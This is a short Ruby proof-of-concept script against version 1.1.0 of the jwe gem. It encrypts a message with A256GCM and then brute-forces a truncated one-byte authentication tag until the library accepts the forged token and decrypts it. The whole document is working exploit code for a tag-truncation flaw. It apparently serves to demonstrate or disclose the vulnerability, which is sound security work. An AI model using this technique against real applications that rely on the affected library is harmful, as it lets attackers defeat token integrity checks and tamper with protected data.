gem 'jwe', '1.1.0'
require 'jwe'
require 'base64'

key = OpenSSL::Random.random_bytes(32)
data= 'Cats can say meow'
jwetoken= JWE.encrypt(data, key, alg: 'dir', enc: 'A256GCM')
puts "The Original JWE token: #{jwetoken}"

parts = jwetoken.split('.')

# Brute force the single byte for auth tag
(0..255).each do |byte|
    single_byte_tag = [byte].pack('C')
    crafted_jwe = [
      parts[0],
      parts[1],
      parts[2],
      parts[3],
      Base64.urlsafe_encode64(single_byte_tag, padding: false)
    ].join('.')
    #puts "The crafted jwe token is: #{crafted_jwe}"
    begin
        # The single byte wrong tag will get validated and cipher text will be decrypted
        decrypted = JWE.decrypt(crafted_jwe, key)
        puts "Found working single-byte tag: 0x#{byte.to_s(16)}"
        puts "Decrypted message: #{decrypted}"
        break
    rescue
    end
end
